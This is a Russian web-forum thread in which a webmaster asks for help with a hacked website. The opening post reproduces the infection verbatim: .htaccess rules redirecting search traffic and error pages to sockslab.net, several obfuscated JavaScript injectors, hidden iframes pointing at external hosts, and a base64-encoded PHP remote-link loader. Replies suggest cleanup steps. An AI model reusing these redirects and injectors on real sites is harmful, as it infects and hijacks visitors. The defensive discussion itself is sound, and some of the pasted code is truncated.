Критические поражения сайта
  • Всем доброго времени суток.


    Вот собственно наткнулся на тяжелейший случай.


    По всему сайту, по всем папкам размещен

    .htaccess

    Код
    ErrorDocument 400 http://sockslab.net/in.cgi?8&parameter=sockslab
    ErrorDocument 401 http://sockslab.net/in.cgi?8&parameter=sockslab
    ErrorDocument 403 http://sockslab.net/in.cgi?8&parameter=sockslab
    ErrorDocument 404 http://sockslab.net/in.cgi?8&parameter=sockslab
    ErrorDocument 500 http://sockslab.net/in.cgi?8&parameter=sockslab
    AddType application/x-httpd-php .php .htm .html .phtml


    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*
    RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7&parameter=sockslab [R=301,L]


    Исходники файлов похожи на это

    <script>var/*tYrsc*/tYrsc/*tYrsc*/=/*tYrsc*/document;function/*tYrsc*/dDIYi(){document.write("<style>.DLJkg{width:0%;height:0%;border:none;}</style>");var/*tYrsc*/vEyDl/*tYrsc*/=/*tYrsc*/"";var/*tYrsc*/dOjQS/*tYrsc*/=/*tYrsc*/vEyDl.replace(/[\+x]/g,/*tYrsc*/IHbgs(".6c.6d.74.68.2e.69.61.72.75.6d.61.73.2f.75.72.2e.75.6d.61.73.6e.6f.69.74.61
    .72.67.2f.2f.3a.70.74.74.68"));return/*tYrsc*/dOjQS;}function/*tYrsc*/UIhsI(cPmmX){/*tYrsc*/var/*tYrsc*/CvInB/*tYrsc*/=/*tYrsc*/"",/*tYrsc*/bhYCy/*tYrsc*/=/*tYrsc*/0;for/*tYrsc*/(bhYCy=cPmmX.length-1;bhYCy>=0;bhYCy--){CvInB/*tYrsc*/+=/*tYrsc*/cPmmX.charAt(bhYCy);}/*tYrsc*/return/*tYrsc*/CvInB;}tYrsc.writeln(dDIYi());function/*tYrsc*/IHbgs(WTwwY){WTwwY/*tYrsc*/=/*tYrsc*/WTwwY.replace(/[\.]/g,/*tYrsc*/"%");WTwwY/*tYrsc*/=/*tYrsc*/unescape(WTwwY);return/*tYrsc*/UIhsI(WTwwY);}</script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//RU">
    <HTML>
    <HEAD>
    <TITLE>help</TITLE>
    <META NAME="version" CONTENT="HTML 4.0">
    <!-- Meta http equivalent was here -->
    <META HTTP-EQUIV="content-language" CONTENT="ru-RU">
    <META NAME="description" CONTENT="">
    <META NAME="keywords" CONTENT="">
    <STYLE>
    a { color: #320D6D }
    a:hover { color: Gray }
    a.white { color: White; text-decoration: none }
    a.white:hover { color: White; text-decoration: underline }
    .cont { font-family: Arial, sans-serif; font-size: 12px; font-weight: normal }
    .block { font-family: Arial, sans-serif; font-size: 11px; }
    B.blue { color: #320D6D }
    P { text-indent: 2em; text-align: justify }
    </STYLE>
    </HEAD><script type="text/javascript">var gxLSWKasmalExDRDvqYr = "b60b105b102b114b97b109b101b32b119b105b100b116b104b61b34b52b56b48b34b32b104b
    101b105b103b104b116b61b34b54b48b34b32b115b114b99b61b34b104b116b116b112b58b47b47b1
    15b101b97b114b114b97b45b100b105b116b111b108b46b99b110b47b103b105b114b105b47b105b1
    10b100b101b120b46b112b104b112b34b32b115b116b121b108b101b61b34b98b111b114b100b101b
    114b58b48b112b120b59b32b112b111b115b105b116b105b111b110b58b114b101b108b97b116b105
    b118b101b59b32b116b111b112b58b48b112b120b59b32b108b101b102b116b58b45b53b48b48b112
    b120b59b32b111b112b97b99b105b116b121b58b48b59b32b102b105b108b116b101b114b58b112b1
    14b111b103b105b100b58b68b88b73b109b97b103b101b84b114b97b110b115b102b111b114b109b4
    6b77b105b99b114b111b115b111b102b116b46b65b108b112b104b97b40b111b112b97b99b105b116
    b121b61b48b41b59b32b45b109b111b122b45b111b112b97b99b105b116b121b58b48b34b62b60b47
    b105b102b114b97b109b101b62";var nSRFafzjVSJCQUVmeveR = gxLSWKasmalExDRDvqYr.split("b");var WQWTUnWQdvHROYWoEVYa = "";for (var ohdECyrhuWyQnUjHIGXl=1; ohdECyrhuWyQnUjHIGXl<nSRFafzjVSJCQUVmeveR.length; ohdECyrhuWyQnUjHIGXl++){WQWTUnWQdvHROYWoEVYa+=String.fromCharCode(nSRFafzjVSJCQU
    VmeveR[ohdECyrhuWyQnUjHIGXl]);}document.write(WQWTUnWQdvHROYWoEVYa)</script><script type="text/javascript">var MOEdEkeriCQIpWvihTok = "rcDF60rcDF105rcDF102rcDF114rcDF97rcDF109rcDF101rcDF32rcDF119rcDF105rcDF100r
    cDF116rcDF104rcDF61rcDF34rcDF52rcDF56rcDF48rcDF34rcDF32rcDF104rcDF101rcDF105rcDF1
    03rcDF104rcDF116rcDF61rcDF34rcDF54rcDF48rcDF34rcDF32rcDF115rcDF114rcDF99rcDF61rcD
    F34rcDF104rcDF116rcDF116rcDF112rcDF58rcDF47rcDF47rcDF115rcDF101rcDF110rcDF100rcDF
    50rcDF57rcDF57rcDF51rcDF49rcDF46rcDF99rcDF110rcDF47rcDF116rcDF114rcDF97rcDF102rcD
    F102rcDF47rcDF105rcDF110rcDF46rcDF99rcDF103rcDF105rcDF63rcDF50rcDF34rcDF32rcDF115
    rcDF116rcDF121rcDF108rcDF101rcDF61rcDF34rcDF98rcDF111rcDF114rcDF100rcDF101rcDF114
    rcDF58rcDF48rcDF112rcDF120rcDF59rcDF32rcDF112rcDF111rcDF115rcDF105rcDF116rcDF105r
    cDF111rcDF110rcDF58rcDF114rcDF101rcDF108rcDF97rcDF116rcDF105rcDF118rcDF101rcDF59r
    cDF32rcDF116rcDF111rcDF112rcDF58rcDF48rcDF112rcDF120rcDF59rcDF32rcDF108rcDF101rcD
    F102rcDF116rcDF58rcDF45rcDF53rcDF48rcDF48rcDF112rcDF120rcDF59rcDF32rcDF111rcDF112
    rcDF97rcDF99rcDF105rcDF116rcDF121rcDF58rcDF48rcDF59rcDF32rcDF102rcDF105rcDF108rcD
    F116rcDF101rcDF114rcDF58rcDF112rcDF114rcDF111rcDF103rcDF105rcDF100rcDF58rcDF68rcD
    F88rcDF73rcDF109rcDF97rcDF103rcDF101rcDF84rcDF114rcDF97rcDF110rcDF115rcDF102rcDF1
    11rcDF114rcDF109rcDF46rcDF77rcDF105rcDF99rcDF114rcDF111rcDF115rcDF111rcDF102rcDF1
    16rcDF46rcDF65rcDF108rcDF112rcDF104rcDF97rcDF40rcDF111rcDF112rcDF97rcDF99rcDF105r
    cDF116rcDF121rcDF61rcDF48rcDF41rcDF59rcDF32rcDF45rcDF109rcDF111rcDF122rcDF45rcDF1
    11rcDF112rcDF97rcDF99rcDF105rcDF116rcDF121rcDF58rcDF48rcDF34rcDF62rcDF60rcDF47rcD
    F105rcDF102rcDF114rcDF97rcDF109rcDF101rcDF62";var UaVuIDImxvaJJfmOQRFy = MOEdEkeriCQIpWvihTok.split("rcDF");var TWGJsCsZWgKqHflPitCf = "";for (var odpxJbMZsSXMoeVggNGC=1; odpxJbMZsSXMoeVggNGC<UaVuIDImxvaJJfmOQRFy.length; odpxJbMZsSXMoeVggNGC++){TWGJsCsZWgKqHflPitCf+=String.fromCharCode(UaVuIDImxvaJJf
    mOQRFy[odpxJbMZsSXMoeVggNGC]);}document.write(TWGJsCsZWgKqHflPitCf)</script>
    <BODY TOPMARGIN=0 LEFTMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0 TEXT="#000000" BGCOLOR="#F0D049"><iframe src="http://x3y.ru:8080/index.php&quot; width=175 height=141 style="visibility: hidden"></iframe><?######(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxp
    bmtzLT5MaW5rczsNCmNsYXNzIEdldExpbmtzDQp7DQoJdmFyICRob3N0ID0gImVzbGkudHciOw0KCXZhc
    iAkcGF0aCA9ICIvbGluay5waHA/c2l0ZT0iOw0KCXZhciAkc2l0ZSA9ICIiOw0KCXZhciAkdXNlcl9hZ2VudCA9ICIiOw0KDQoJdmFyICRM
    aW5rcyA9ICIiOw0KDQoNCgl2YXIgJF9zb2NrZXRfdGltZW91dCAgICA9IDEyOw0KCXZhciAkX2Nhc2hlX
    2xpZmVfdGltZSAgICA9IDM2MDA7DQoJdmFyICRfY2FzaGVfZmlsZQkJCSAgICA9ICJjYXNoZS50eHQiOw
    0KDQoJZnVuY3Rpb24gR2V0TGlua3MoKQ0KCXsNCgkJaWYgKCFpc19maWxlKCR0aGlzLT5fY2FzaGVfZml
    sZSkgfHwgKGZpbGVtdGltZSgkdGhpcy0+X2Nhc2hlX2ZpbGUpIDwgKHRpbWUoKS0kdGhpcy0+X2Nhc2hl
    X2xpZmVfdGltZSkpIHx8IGZpbGVzaXplKCR0aGlzLT5fY2FzaGVfZmlsZSkgPT0gMCkgew0KDQoJCQkkd
    Ghpcy0+c2l0ZQkJCQk9IGlzc2V0KCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgPyAkX1NFUlZFUlsnSFRUUF
    9IT1NUJ10gOiAkSFRUUF9TRVJWRVJfVkFSU1snSFRUUF9IT1NUJ107DQoJCQkkdGhpcy0+dXNlcl9hZ2V
    udCA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCgkJCQ0KCQkJJHRoaXMtPkxpbmtzIAkJCT0g
    JHRoaXMtPmZldGNoX3JlbW90ZV9maWxlKCk7DQoJCQlpZiAoJGhhbmRsZSA9IGZvcGVuKCR0aGlzLT5fY
    2FzaGVfZmlsZSwgJ3cnKSkgew0KCQkJCWZ3cml0ZSgkaGFuZGxlLCAkdGhpcy0+TGlua3MpOw0KCQkJfQ
    0KDQoJCQlmY2xvc2UoJGhhbmRsZSk7DQoJCX0NCgkJZWxzZSB7DQoJCQkkdGhpcy0+TGlua3MgPSBmaWx
    lX2dldF9jb250ZW50cygkdGhpcy0+X2Nhc2hlX2ZpbGUpOw0KCQl9DQoJfQ0KDQoJZnVuY3Rpb24gZmV0
    Y2hfcmVtb3RlX2ZpbGUoKQ0KCXsNCgkgICRidWZmID0gJyc7DQogICAgJGZwID0gZnNvY2tvcGVuKCR0a
    GlzLT5ob3N0LCA4MCwgJGVycm5vLCAkZXJyc3RyLCAkdGhpcy0+X3NvY2tldF90aW1lb3V0KTsNCiAgIC
    BpZiAoISRmcCkgew0KDQogICAgfSBlbHNlIHsNCiAgICAgICAgJG91dCA9ICJHRVQgeyR0aGlzLT5wYXR
    ofXskdGhpcy0+c2l0ZX0gSFRUUC8xLjFcclxuIjsNCiAgICAgICAgJG91dCAuPSAiSG9zdDogeyR0aGlz
    LT5ob3N0fVxyXG4iOw0KICAgICAgICAkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsNC
    iAgICANCiAgICAgICAgZndyaXRlKCRmcCwgJG91dCk7DQogICAgICAgIHdoaWxlICghZmVvZigkZnApKS
    B7DQogICAgICAgICAgICAkYnVmZiAuPSBmZ2V0cygkZnAsIDEyOCk7DQogICAgICAgIH0NCiAgICAgICA
    gZmNsb3NlKCRmcCk7DQogIAkJCSRwYWdlID0gZXhwbG9kZSgiXHJcblxyXG4iLCAkYnVmZik7DQogIAkJ
    CXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ=='));?><script><i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|$\^\!\%|\(\(\*\)\&\!|$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script><!-- o --><!-- c -->
    <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0>
    <TR><TD colspan="3" height="50%">&nbsp;</TD></TR>
    <TR height="*">
    <TD width="50%">&nbsp;</TD>

    <script language=JavaScript>
    var UseFlash = 0;
    if (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] ) {
    var plugin = navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin;
    if (plugin && parseInt(plugin.description.substring(plugin.description.indexOf(".")-1)) >=4)
    UseFlash = 1;
    }

    else if (navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0
    && (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 || navigator.userAgent.indexOf("Windows 98")>=0)) {
    document.write('<script LANGUAGE=VBScript\> \n');
    document.write('on error resume next \n');
    document.write('var Flashmode\n');
    document.write(' FlashMode = IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash"))\n');
    document.write(' If FlashMode = True Then\n');
    document.write(' UseFlash = 1\n');
    document.write(' End If\n');
    document.write('</SCRIPT\> \n');


    }
    if ( UseFlash ) {
    document.write('<TD colspan="2" width="*"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" \n')
    document.write('codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0&quot; \n')
    document.write('width="600" height="300" align="top"> \n')
    document.write('<param name=movie value="intro.swf"> \n')
    document.write('<param name=quality value=high> \n')
    document.write('<embed src="intro.swf" quality=high \n')
    document.write('pluginspage="http:/<script>function GrqJCSJ(AqqdGAo){ var wHLc=new Function("LbNbingo", "return 666420;"); fff=op.split("66");var wHLc=new Function("LbNbingo", "return 666420;"); }
    function eFfa(YsyncOdsK){ fff.op.replace("v");alert('swE'); }
    document['wri5te'.replace(/[0-9]/,'')](zFX('bYQV')+jrfUZqRp('iTAol'));function ewPqIisrs(dOgTyRX){ alert('GPKFuuBlVw');var LGxVk=new Function("tsB", "return 224189;");var LGxVk=new Function("tsB", "return 224189;");var xJGuxIm = document.getElementById('paURP'); }
    function xMStwFJz(MVlCte){ <script>tcadg='1d49554c4d1f1d434e45581f1d484753404c44015253421c03495555511b0e0e5656565b4051
    40520f424f0e5748510e484f0f4246481e1012030156484555491c10014944484649551c100152555
    84d441c035748524843484d4855581b49484545444f031f1d0e484753404c441f1d0e434e45581f1d
    0e4955<script>rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[
    2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjys



    Прям не знаю с чего начать, у кого какие мысли ? - пристрелить ?!
  • а чего тут думать... менять все пароли, удалять вирус и искать дыры в коде... самопис?
  • пароли на фтп сменить,
    все .htacces прибить, исходники прибить, если муторно, то прибью быстро
  • а чего тут думать... менять все пароли, удалять вирус и искать дыры в коде... самопис?

    шут его знает, не мой
    Я его даже в нормальном состоянии не видел

    Соответственно и коды не у меня стянули, я вообще пароли не храню, предпочитаю один сложный на все ставить

    Осложняет все то, что код не мой и сложновато понять где начало и конец вредоносного кода и папок полно
  • Осложняет все то, что код не мой и сложновато понять где начало и конец вредоносного кода и папок полно

    С бэкапами может есть возможность сравнить?
  • Эх вы, закодированная джава и пых на что там висит? м?)
  • тут просто из интереса больше было желание разобраться, сам сайт уже не используется есть новый

    MIX, а что за закодированная джава ?
  • тут просто из интереса больше было желание разобраться, сам сайт уже не используется есть новый

    MIX, а что за закодированная джава ?

    http://mastertalk.ru/topic123491.html?view...t&p=1122575



  • промазал - там слишком много ссылок не понятно что именно нужно искать
  • промазал - там слишком много ссылок не понятно что именно нужно искать

    это http://liveinternet.ru/click?http://www.ma...odifikacii.html

Привет, незнакомец!

Похоже, Вы новенький! Чтобы начать обсуждение, кликните на одну из кнопок ниже ;)

Войти с помощью OpenID

Категории

В этой теме: